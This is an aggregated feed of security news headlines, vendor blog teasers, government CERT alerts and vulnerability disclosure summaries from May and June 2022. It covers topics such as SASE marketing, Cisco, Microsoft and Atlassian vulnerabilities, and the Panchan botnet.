https://www.akamai.com/blog/developers/meet-josh-johnson-senior-enterprise-architect
How to Gradually Deploy SASE in an Enterprise
2022-06-16T12:44:48Z | 1655383488

For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified,... The post How to Gradually Deploy SASE in an Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-gradually-deploy-sase-in-an-enterprise/
Security Alert (A22-06-09): Multiple Vulnerabilities in Cisco Products
2022-06-16T04:00:00Z | 1655352000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Panchan?s Mining Rig: New Golang Peer-to-Peer Botnet Says ?Hi!?
2022-06-15T13:00:00Z | 1655298000

Akamai researchers have discovered a new P2P botnet targeting APJ. Read about it here.

https://www.akamai.com/blog/security-research/new-p2p-botnet-panchan
High Threat Security Alert (A22-06-08): Multiple Vulnerabilities in Microsoft Products (June 2022)
2022-06-15T04:00:00Z | 1655265600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Blynk Blynk-Library BlynkConsole.h runCommand stack-based buffer overflow vulnerability
2022-06-15T00:00:00Z | 1655251200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1524
Bachmann Visutec GmbH Atvise License registration information disclosure vulnerability
2022-06-15T00:00:00Z | 1655251200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1461
Anker Eufy Homebase 2 mips_collector appsrv_server use-after-free vulnerability
2022-06-15T00:00:00Z | 1655251200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1440
Corsa Security Orchestrator Provides Industry-Leading ROI for On-premise Virtual Firewall Deployments
2022-06-14T14:00:00Z | 1655215200

Integration of credit-based licensing ensures maximization of firewall credits through scaling and adjusting for capacity surges Corsa Security, the leader in automating network security virtualization, today announced significant updates to their Corsa Security Orchestrator, a virtual infrastructure manager for deploying, scaling and optimizing on-premise virtual firewalls. The Orchestrator now integrates credit-based licencing from leading firewall vendors, […] The post Corsa Security Orchestrator Provides Industry-Leading ROI for On-premise Virtual Firewall Deployments appeared first on Corsa Security.

https://www.corsa.com/2022/06/14/corsa-security-orchestrator-provides-industry-leading-roi-for-on-premise-virtual-firewall-deployments/
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce
2022-06-14T13:30:08Z | 1655213408

Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality. For IT teams, this abrupt change was unexpected. As a result, organizations did... The post Your Post COVID Guide: Strategically Planning for the Hybrid Workforce appeared first on Cato Networks.

https://www.catonetworks.com/blog/your-post-covid-guide-strategically-planning-for-the-hybrid-workforce/
CVE-2022-22732
2022-06-14T00:00:00Z | 1655164800

CWE-668: Exposure of Resource to Wrong Sphere A vulnerability exists that could cause all remote domains to access the resources (data) supplied by the server when an attacker sends a fetch request from third-party site or malicious site.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22732
CVE-2022-22731
2022-06-14T00:00:00Z | 1655164800

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') A vulnerability exists in a function that could allow an attacker to create or overwrite critical files that are used to execute code, such as programs or libraries and cause path traversal attacks.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22731
CVE-2022-0223
2022-06-14T00:00:00Z | 1655164800

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') A vulnerability exists that could allow an attacker to create or overwrite critical files that are used to execute code, such as programs or libraries and cause unauthenticated code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2022-0223
Security Alert (A22-06-07): Multiple Vulnerabilities in Drupal
2022-06-13T04:00:00Z | 1655092800

Drupal has released a security advisory to address multiple vulnerabilities in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
The Upside-Down World of Networking & Security
2022-06-10T16:53:02Z | 1654879982

The post The Upside-Down World of Networking & Security appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security
Security Alert (A22-06-05): Multiple Vulnerabilities in Google Chrome
2022-06-10T04:00:00Z | 1654833600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-06-06): Vulnerability in Microsoft Edge (Chromium-based)
2022-06-10T04:00:00Z | 1654833600

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Themes from PyCon US 2022
2022-06-09T11:00:19Z | 1654772419

After two long years of lockdowns, virtual meetups, quarantines, and general chaos, the Python community gathered en masse to Salt Lake City for PyCon 2022. Two of our engineers attended the conference, and we are happy to report that the Python community is not only alive and well but also thriving, with […]

https://blog.trailofbits.com/2022/06/09/themes-from-pycon-us-2022/
Security Alert (A22-06-04): Multiple Vulnerabilities in Apache HTTP Server
2022-06-09T04:00:00Z | 1654747200

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Nova versão do esquema de certificação - Quadro Nacional de Referência para a Cibersegurança
2022-06-09T00:00:00Z | 1654732800

O CNCS acaba de publicar uma nova versão do projeto de EC QNRCS e do Anexo 5 - Critérios e decisões de auditoria, para uma segunda ronda de recolha de comentários e sugestões. Recordamos que o CNCS se encontra a   desenvolver um Esquema de Certificação para o Quadro Nacional de Referência para a Cibersegurança (EC QNRCS). Com este esquema procura-se atestar a implementação em organizações candidatas das medidas estabelecidas no QNRCS para identificação, proteção, deteção, resposta e recuperação contra as ameaças à segurança da informação, bem como das redes e sistemas de informação.A primeira versão do esquema esteve em consulta pública em dezembro de 2021 e desde então foram efetuadas alterações significativas ao esquema.A restante documentação associada e que se mantém disponível nesta página terá ainda de ser atualizada em função das alterações entretanto produzidas no esquema e no Anexo 5. Todos os contributos serão devidamente apreciados para a definição das versões finais dos documentos, inclusive no que respeita à documentação ainda não atualizada.Para quem esteja interessado em participar neste processo, enviando contributos, deverá consultar a página relativa a esta matéria, que poderá ser encontrada aqui.Informa-se que os contributos podem ser enviados por correio eletrónico para o endereço: drsc@cncs.gov.pt, preferencialmente até dia 08 de julho de 2022.

https://dyn.cncs.gov.pt/pt/detalhe/art/135671/nova-versao-do-esquema-de-certificacao-quadro-nacional-de-referencia-para-a-ciberseguranca
Olukord küberruumis – mai 2022
2022-06-07T10:45:35Z | 1654598735

Mais registreerisime 198 mõjuga intsidenti, mis on viimase aasta keskmisest veidi madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-mai-2022
How to Succeed as a CIO in 100 Days
2022-06-07T07:46:18Z | 1654587978

A CIO position is exciting but also challenging, especially if it’s your first role… And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use... The post How to Succeed as a CIO in 100 Days appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-succeed-as-a-cio-in-100-days/
Security Alert (A22-06-03): Multiple Vulnerabilities in Android
2022-06-07T04:00:00Z | 1654574400

Google has released Android Security Bulletin June 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
10 Years Since World IPv6 Launch
2022-06-06T13:00:00Z | 1654520400

A decade past World IPv6 Launch and we are well through the migration away from legacy IPv4, but still have a long way to go.

https://www.akamai.com/blog/trends/10-years-since-world-ipv6-launch
Akamai: Protecting Life Online with Secure Internet Access
2022-06-06T13:00:00Z | 1654520400

Easily deliver value-added security services to families and businesses with Akamai Secure Internet Access services for ISPs and MNOs.

https://www.akamai.com/blog/security/akamai-protecting-life-online-with-secure-internet-access
The Next Generation of HTTP
2022-06-06T09:00:00Z | 1654506000

The IETF just released HTTP/3, an update to HTTP that leverages new transport protocol QUIC. Learn about how the new RFCs can affect any references to HTTP.

https://www.akamai.com/blog/news/the-next-generation-of-http
Critical zero-day vulnerability in Atlassian Confluence Server and Confluence Datacenter
2022-06-03T13:43:00Z | 1654263780

Software company Atlassian issued an advisory on 2 June concerning a previously unknown critical vulnerability (CVE-2022-26134), a so-called zero-day. The vulnerability concerns all supported versions of Atlassian Confluence Server and Confluence Datacenter. This does not concern Atlassian Cloud according to Atlassian. NCSC-NL published an advisory, rating the vulnerability as High/High. No patch is currently available.

https://english.ncsc.nl/latest/news/2022/juni/3/critical-zero-day-vulnerability
How Akamai Works with Internet Organizations
2022-06-03T13:00:00Z | 1654261200

Learn about a few of the internet organizations, who are developing standards and best practices, that Akamai works with to help foster innovation.

https://www.akamai.com/blog/culture/how-akamai-works-with-internet-organizations
Akamai Protects Against the Atlassian Confluence 0-Day (CVE-2022-26134)
2022-06-03T09:00:52Z | 1654246852

Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) that?s affecting Confluence Server and Data Center products.

https://www.akamai.com/blog/security/akamai-protects-against-atlassian-confluence-0-day
ZTNA Alone is Not Enough to Secure the Enterprise Network
2022-06-02T07:46:18Z | 1654155978

ZTNA is a Good Start for Security Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave the organization vulnerable to attack and are ill-suited to the modern distributed enterprise. Zero trust, which retracts the “perimeter” to a single asset, provides better security and access management for... The post ZTNA Alone is Not Enough to Secure the Enterprise Network appeared first on Cato Networks.

https://www.catonetworks.com/blog/ztna-alone-is-not-enough-to-secure-the-enterprise-network/
New vulnerability in a Microsoft tool enables attacks using malicious Microsoft Office documents
2022-06-01T11:01:25Z | 1654081285

A new zero-day vulnerability has been detected in the Microsoft Support Diagnostic Tool enabling remote code execution by using malicious Microsoft Word documents. Microsoft released a fix 14.6. that should be installed as soon as possible.

https://www.kyberturvallisuuskeskus.fi/en/haavoittuvuus_10/2022
Uus venekeelne raadiosari räägib lihtsas keeles kübermaailma tahkudest
2022-06-01T06:00:00Z | 1654063200

6. juunil jõuab Raadio 4 eetrisse esimene episood küberteadmistele keskenduvast raadiosarjast „Bведи пароль“ („Sisesta parool“). Valdkonna eksperdid räägivad saadetes muuhulgas lunavararünnakutest, info- ja kübersõjast, krüptovaluutast, e-riigist ja tuleviku tehnoloogiatest.

https://ria.ee/uudised/uus-venekeelne-raadiosari-raagib-lihtsas-keeles-kubermaailma-tahkudest
Tarneahelaründed: võimalik mõju ja kuidas end kaitsta
2022-06-01T06:00:00Z | 1654063200

Viimastel aastatel on üha enam toimunud tarneahelaründeid, mille tagajärjel saadakse sihtmärkide võrkudele ja infosüsteemidele ligipääs ühise IT-teenusepakkuja kaudu. Kirjutame RIA blogis, kuidas nende eest end paremini kaitsta. Allolev lühem versioon blogipostitusest.

https://ria.ee/uudised/tarneahelarunded-voimalik-moju-ja-kuidas-end-kaitsta
Security Alert (A22-06-01): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-06-01T04:00:00Z | 1654056000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-06-02): Multiple Vulnerabilities in Firefox
2022-06-01T04:00:00Z | 1654056000

Mozilla has published the advisories (MFSA2022-20 and MFSA2022-21) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato Protects Against Microsoft Office Follina Exploits
2022-05-31T07:46:18Z | 1653983178

Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems. Earlier today Microsoft issued CVE-2022-30190 that describes the remote code execution (RCE) vulnerability within Office. It can be exploited when the Microsoft Support Diagnostic Tool (MSDT) is called using by a URL... The post Cato Protects Against Microsoft Office Follina Exploits appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-patches-zero-day-flaw-in-microsoft-office/
High Threat Security Alert (A22-05-17): Vulnerability in Microsoft Windows
2022-05-31T04:00:00Z | 1653969600

Microsoft has released an out-of-band security advisory to address the vulnerability in Microsoft Diagnostic Tool (MSDT) being called via the URL protocol from a calling application such as Word.

https://www.govcert.gov.hk/en/alerts_detail.php
DNS: The Easiest Way to Exfiltrate Data?
2022-05-27T13:00:00Z | 1653656400

Low throughput DNS exfiltration is a slow and low attack technique that is very hard to detect. Learn how Akamai can quickly detect this in near real time.

https://www.akamai.com/blog/security/dns-the-easiest-way-to-exfiltrate-data
How Akamai?s Employees Help Us Achieve Our Sustainability Goals
2022-05-26T13:00:00Z | 1653570000

Learn about our commitment to environmental sustainability, Akamai Earth Month, and other campaigns that inspire employees to take action to protect the planet.

https://www.akamai.com/blog/culture/akamai-employees-helping-achieve-sustainability-goals
What Others Won’t Tell You About MPLS
2022-05-26T07:46:18Z | 1653551178

MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network. 5 Considerations... The post What Others Won’t Tell You About MPLS appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-others-wont-tell-you-about-mpls/
Security Alert (A22-05-16): Vulnerability in Drupal
2022-05-26T04:00:00Z | 1653537600

Drupal has released a security advisory to address a vulnerability in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
REvil Resurgence? Or a Copycat?
2022-05-25T13:00:00Z | 1653483600

Has REvil returned? In this new post by Akamai's SIRT, see a DDoS incident by a threat actor claiming to be REvil.

https://www.akamai.com/blog/security/revil-resurgence-or-copycat
What?s New for Developers: May 2022
2022-05-25T13:00:00Z | 1653483600

Read on to get information on Akamai?s new managed database service powered by Linode, to watch a fun video on DDoS attacks, and more.

https://www.akamai.com/blog/developers/whats-new-for-developers-may-2022
Security Alert (A22-05-15): Multiple Vulnerabilities in Google Chrome
2022-05-25T04:00:00Z | 1653451200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Open Automation Software Platform Engine SecureBrowseFile information disclosure vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1494
Open Automation Software OAS Platform REST API unauthenticated vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1513
Open Automation Software Platform Engine cleartext transmission of sensitive information vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1490
Open Automation Software Platform Engine SecureConfigValues denial of service vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1491
Open Automation Software Platform Engine SecureTransferFiles information disclosure vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1492
Open Automation Software Platform Engine SecureTransferFiles file write vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1493
Open Automation Software Platform Engine SecureAddUser External config control vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1488
Open Automation Software Platform Engine SecureAddSecurity external config control vulnerability
2022-05-25T00:00:00Z | 1653436800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1489
Azure SD-WAN: Cloud Datacenter Integration with Cato Networks
2022-05-24T07:46:18Z | 1653378378

As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs and complexity. There’s been no good approach to building an Azure SD-WAN — until now. Cato’s approach to Azure SD-WAN improves performance AND simplifies security, affordably. Let’s see how. Azure... The post Azure SD-WAN: Cloud Datacenter Integration with Cato Networks appeared first on Cato Networks.

https://www.catonetworks.com/blog/azure-sd-wan-cloud-datacenter-integration-with-cato-networks/
High Threat Security Alert (A22-05-13): Vulnerability in Cisco Products
2022-05-23T04:00:00Z | 1653278400

Cisco released security advisory to address the vulnerability in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-05-14): Multiple Vulnerabilities in Firefox
2022-05-23T04:00:00Z | 1653278400

Mozilla has published the advisory (MFSA2022-19) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
2022-05-23T00:00:00Z | 1653264000

Dealing with Virtualization-Based Security (VBS), Hypervisor-Protected Code Integrity (HVCI), and Kernel Control Flow Guard (kCFG).

/hvci/
Cyber weather continued rainy in April
2022-05-20T06:50:43Z | 1653029443

Cyber weather in April included spring rain. The new wave of the FluBot malware campaign gained high visibility. There are also other scam and phishing messages going around, as usual. Fortunately, some progress was also made in the field of cyber security as a joint project implemented by the Digital and Population Data Services Agency and the NCSC-FI successfully identified vulnerabilities in the municipal sector and the healthcare and social welfare sector.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2022
Cyber weather continued rainy in April
2022-05-20T06:50:43Z | 1653029443

Cyber weather in April included spring rain. The new wave of the FluBot malware campaign gained high visibility. There are also other scam and phishing messages going around, as usual. Fortunately, some progress was also made in the field of cyber security as a joint project implemented by the Digital and Population Data Services Agency and the NCSC-FI successfully identified vulnerabilities in the municipal sector and the healthcare and social welfare sector.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2022
Fidelis Security Strengthens Ransomware Capabilities
2022-05-19T21:56:47Z | 1652997407

BETHESDA, Md.–(BUSINESS WIRE) – Fidelis Security today announced Fidelis Endpoint®, a favored solution of forensics and incident response professionals worldwide, successfully detected Data Encrypted For Impact (T1486), which is indicative of Ransomware attacks, during the 2021 MITRE Engenuity Round 4 ATT&CK® Evaluation. In this MITRE evaluation, the Fidelis Security Endpoint Detection and Response (EDR) platform […] The post Fidelis Security Strengthens Ransomware Capabilities appeared first on Fidelis Security.

https://fidelissecurity.com/press/fidelis-security-strengthens-ransomware-capabilities/
Meet Mike Schiessl: Senior Technical Marketing Engineer
2022-05-19T13:00:00Z | 1652965200

Meet Mike Schiessl to learn more about his career path, how companies can support a DevOps to DevSecOps transition, and the future of security and business.

https://www.akamai.com/blog/developers/meet-senior-technical-marketing-engineer-mike-schiessl
The Challenge of Defining DNS Abuse
2022-05-19T13:00:00Z | 1652965200

DNS Abuse is a pretty widely used term. On the surface, it might seem like a simple term that's easily understood. But when you look more closely, the definition depends on your perception of the issue—and can be defined both broadly, or more narrowly.

https://www.first.org/blog/20220519_The_Challenge_of_Defining_DNS_Abuse
The Challenge of Defining DNS Abuse
2022-05-19T13:00:00Z | 1652965200

DNS Abuse is a pretty widely used term. On the surface, it might seem like a simple term that's easily understood. But when you look more closely, the definition depends on your perception of the issue—and can be defined both broadly, or more narrowly.

https://www.first.org/blog/20220519_The_Challenge_of_Defining_DNS_Abuse
The Only SASE RFP Template You’ll Ever Need
2022-05-19T07:46:18Z | 1652946378

Why do you need a SASE RFP? Shopping for a SASE solution isn’t as easy as it sounds… SASE is an enterprise networking and security framework that is relatively new to the enterprise IT market (introduced by Gartner in 2019.) And less than 3 years young, SASE is often prone to misunderstanding and vendor “marketecture.”... The post The Only SASE RFP Template You’ll Ever Need appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-only-sase-rfp-template-youll-ever-need/
High Threat Security Alert (A22-05-10): Multiple Vulnerabilities in VMware Products
2022-05-19T04:00:00Z | 1652932800

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-05-11): Multiple Vulnerabilities in Cisco Products
2022-05-19T04:00:00Z | 1652932800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-05-12): Vulnerability in ISC BIND
2022-05-19T04:00:00Z | 1652932800

ISC has released a security update to fix the vulnerability in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-30551
2022-05-19T00:00:00Z | 1652918400

This security update resolves a vulnerability in the OPC UA Legacy Java Stack and Prosys OPC UA Stack that allows a malicious client to send messages that prevent a server from accepting new requests.

https://claroty.com/team82/disclosure-dashboard/cve-2022-30551
Don’t Ruin ZTNA by Planning for the Past
2022-05-18T07:46:18Z | 1652859978

Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt to more distributed IT environments. Legacy solutions such as virtual private networks (VPNs) are ill-suited to the distributed enterprise and do not provide the granular access controls necessary to protect... The post Don’t Ruin ZTNA by Planning for the Past appeared first on Cato Networks.

https://www.catonetworks.com/blog/dont-ruin-ztna-by-planning-for-the-past/
ID-kaardiga allkirjastamisel on vaja Web eID sisselülitada
2022-05-18T06:00:00Z | 1652853600

Kas sul ei õnnestu e-teenuses ID-kaardiga allkirjastamine? Kontrolli, kas sinu veebilehitsejas on Web eID laiendus sisselülitatud.

https://ria.ee/uudised/id-kaardiga-allkirjastamisel-vaja-web-eid-sisselulitada
Võõrale lingile vajutanu võib kaotada Facebooki konto
2022-05-18T06:00:00Z | 1652853600

Küberründajad levitavad jätkuvalt Facebooki vestlustes pahaloomuliste veebilehtede linke ühes tekstis „Kas see oled sina selles videos?“. Ründajad proovivad nii Facebooki kontosid üle võtta. Parim vastumeede on linkide eiramine ning nende edasi saatmine CERT-EE-le analüüsimiseks.

https://ria.ee/uudised/voorale-lingile-vajutanu-voib-kaotada-facebooki-konto
4 Steps to Prepare for Open Enrollment: Ready for Takeoff?
2022-05-17T13:00:00Z | 1652792400

Preparing for open enrollment is a key part of running efficient healthcare organizations, but it's difficult to know where to start. Learn which steps to take.

https://www.akamai.com/blog/edge/4-steps-to-prepare-for-open-enrollment
Interactive decompilation with rellic-xref
2022-05-17T11:00:09Z | 1652785209

Rellic is a framework for analyzing and decompiling LLVM modules into C code, implementing the concepts described in the original paper presenting the Dream decompiler and its successor, Dream++. It recently made an appearance on this blog when I presented rellic-headergen, a tool for extracting debug metadata from LLVM modules and turning […]

https://blog.trailofbits.com/2022/05/17/interactive-decompilation-with-rellic-xref/
Security Alert (A22-05-08): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-05-17T04:00:00Z | 1652760000

Apple has released iOS 15.5 and iPadOS 15.5 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-05-09): Vulnerability in Apache Tomcat
2022-05-17T04:00:00Z | 1652760000

Apache Software Foundation has released a security advisory to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA nvwgf2umx_cfg.dll shader DCL_INDEXABLE memory corruption vulnerability
2022-05-17T00:00:00Z | 1652745600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1435
NVIDIA nvwgf2umx_cfg.dll shader DCL_RESOURCE_STRUCTURED memory corruption vulnerability
2022-05-17T00:00:00Z | 1652745600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1438
NVIDIA nvwgf2umx_cfg.dll shader DCL_UNORDERED_ACCESS_VIEW_STRUCTURED memory corruption vulnerability
2022-05-17T00:00:00Z | 1652745600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1437
NVIDIA nvwgf2umx_cfg.dll shader DCL_INDEXRANGE memory corruption vulnerability
2022-05-17T00:00:00Z | 1652745600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1436
SMA100 post-authentication Remote Command Execution vulnerability
2022-05-16T21:21:45Z | 1652736105

Improper neutralization of special elements in the SonicWall SSL-VPN SMA100 series management interface allows a remote authenticated attacker to inject OS Command as a 'root' user which potentially leads to remote command execution vulnerability or denial of service (DoS) attack.IMPORTANT: SMA 1000 series products are not affected by this vulnerability. CVE: CVE-2022-1703 Last updated: May 16, 2022, 9:21 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0010
Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’
2022-05-16T13:39:00Z | 1652708340

Introduction: Discussing Transformation with the Board Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one is immune from the machinations of technological evolution and the associated disruption that follows. As a result, we can no longer separate business strategy from technology strategy, forcing corporate boards... The post Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’ appeared first on Cato Networks.

https://www.catonetworks.com/blog/talking-sase-to-your-board-cios-guide/
Cato Expands to Marseilles and Improves Resiliency Within France
2022-05-16T07:46:18Z | 1652687178

Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our 20th in EMEA. Overall, Cato SASE Cloud is comprised of 70+ PoPs worldwide, bringing Cato’s capabilities to more than 150 countries. As with all our PoPs, Marseilles isn’t just a... The post Cato Expands to Marseilles and Improves Resiliency Within France appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-expands-to-marseilles-improves-resiliency-within-france/
Security Alert (A22-05-07): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-05-16T04:00:00Z | 1652673600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Detecting Malicious JavaScript with Secure Internet Access Enterprise Secure Web Gateway
2022-05-13T13:00:00Z | 1652446800

JavaScript is everywhere, and when malicious can be hugely detrimental. In this blog, learn about the types of malicious JavaScript and how Akamai's SWG product helps keep you more secure from it.

https://www.akamai.com/blog/security/detecting-malicious-javascript-with-swg
Microsoft panustab Eesti virtuaalse abilise Bürokrati arengusse
2022-05-13T06:00:00Z | 1652421600

Veebruaris külastasid Riigi Infosüsteemi Ametit (RIA) ja Majandus- ja kommunikatsiooniministeeriumit Microsofti Euroopa harukontori esindajad, kes sõlmisid Eesti riigiga koostööleppe.

https://ria.ee/uudised/microsoft-panustab-eesti-virtuaalse-abilise-burokrati-arengusse
Publicado projeto de Guia para Gestão de Riscos para contributos
2022-05-13T00:00:00Z | 1652400000

O Centro Nacional de Cibersegurança acaba de publicar o projeto de Guia para Gestão de Riscos visando a recolha de contributos, comentários e sugestões de melhoria, que serão apreciados e consolidados numa versão final.    O Guia para Gestão de Riscos em matérias de Segurança da Informação e Cibersegurança tem como objetivo definir uma abordagem de referência sistematizada e coerente ao processo de análise, avaliação e tratamento periódico dos riscos e de aferição da forma como estes se relacionam no âmbito da prestação de um bem ou serviço.     Esta metodologia de gestão dos riscos pretende servir de base orientadora para o cumprimento do artigo 10.º do Decreto-Lei n.º 65/2021, de 30 de julho, no qual as entidades abrangidas devem realizar uma análise dos riscos em relação a todos os ativos que garantam a continuidade do funcionamento das redes e dos sistemas de informação que utilizam e, no caso dos operadores de serviços essenciais, também em relação aos ativos que garantam a prestação dos serviços essenciais.     A quem o aplica, será possível a definição e implementação de medidas e controlos de segurança ao nível técnico e organizativo adequadas para gerir os riscos que se colocam à segurança das redes e dos sistemas de informação que utilizam, levando a cabo, ao longo do tempo a melhoria pretendidas na gestão dos riscos e a um nível de segurança adequado ao risco considerado como aceitável.    Para quem esteja interessado em participar neste processo, enviando contributos, deverá consultar a página relativa a esta matéria, que poderá ser encontrada aqui.    Informa-se que os contributos podem ser enviados por correio eletrónico para o endereço: drsc@cncs.gov.pt, preferencialmente até dia 14 de junho de 2022. 

https://dyn.cncs.gov.pt/pt/detalhe/art/135666/publicado-projeto-de-guia-para-gestao-de-riscos-para-contributos
SonicWall SSLVPN SMA1000 series affected by multiple vulnerabilities
2022-05-12T17:59:32Z | 1652378372

SonicWall SSLVPN SMA1000 series appliances are affected by the below listed multiple vulnerabilities, organizations running previous versions of SSLVPN SMA1000 series firmware should upgrade to new firmware release versions.1) Unauthenticated access control bypass - SMA1000 series appliance incorrectly restricts access to a resource from an unauthorized actor leading to Improper Access Control vulnerability.CVSS score - 8.2(High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:NCWE-284: Improper Access Control2) Use of a shared and hard-coded encryption keyCVSS score - 5.7(Medium) CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:NCWE-321: Use of Hard-coded Cryptographic Key3) SMA1000 series appliances accept a user-controlled input that specifies a link to an external site and uses that link in a redirect which leads to Open redirection vulnerability.CVSS score - 6.1(Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE-601: URL Redirection to Untrusted Site ('Open Redirect') CVE: CVE-2022-22282, CVE-2022-1701, CVE-2022-1702 Last updated: Aug. 3, 2022, 5:59 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0009
How to Cover 6 Core Areas of PCI Compliance with Armis and Akamai
2022-05-12T13:00:00Z | 1652360400

The joint security solution from Akamai Guardicore Segmentation and Armis supports PCI compliance requirements to protect consumer data across entire networks.

https://www.akamai.com/blog/security/pci-compliance-armis-akamai
Don’t Turn a Blind Eye to TLS Traffic
2022-05-12T07:46:18Z | 1652341578

TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting data end-to-end between two points, ideally preventing bad actors from having visibility into the traffic of your web session. However, threat actors have also come to see the value in... The post Don’t Turn a Blind Eye to TLS Traffic appeared first on Cato Networks.

https://www.catonetworks.com/blog/dont-turn-a-blind-eye-to-tls-traffic/
CVE-2022-1362
2022-05-12T00:00:00Z | 1652313600

CWE-78 : IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') The affected On-Premise cnMaestro is vulnerable inside a specific route where a user can upload a crafted package to the system. An attacker could abuse this user-controlled data to execute arbitrary commands on the server.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1362
CVE-2022-1361
